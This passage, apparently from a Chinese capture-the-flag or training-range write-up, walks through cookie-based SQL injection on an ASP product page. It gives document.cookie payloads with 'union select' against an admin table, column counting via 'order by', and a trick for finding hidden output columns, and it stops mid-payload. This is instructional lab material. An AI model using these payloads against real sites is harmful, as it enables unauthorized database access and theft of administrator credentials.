document.cookie= “id=”+escape(“171 union select 1,2,3,4,5,6,7,8,9,admin. from admin”)
提示数据库报错,
一直减到:
document.cookie= “id=”+escape(“171 union select admin. from admin”)
仍然提示数据库报错。
说明注入点查询的表的字段数小于admin表中的字段数。
ps:漏洞不可能只存在一个,因为开发者开发思路是一样的,一般来说相似的漏洞会在同一个网站频繁出现。
在靶场产品中心的某个产品页面试下:
http://kypt8004.ia.aqlab.cn/ProductShow.asp?ID=105
document.cookie=”id=”+escape(“105 order by 1”) 页面正常
document.cookie=”id=”+escape(“105 order by 100”) 找不到此产品!
通过二分法不停找,发现26个字段。
document.cookie=”id=”+escape(“105 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from admin”)
可见3,5,7为注入点。
其实25也是注入点,隐藏在图片里。
那么,怎样才能把所有隐藏点都找到呢?
每个数字后面加一串容易辨识的长数字(随便什么数字),比如:
document.cookie=”id=”+escape(“105 union select 177777,277777,377777,477777,577777,677777,777777,877777,977777,1077777,1177777,1277777,1377777,14777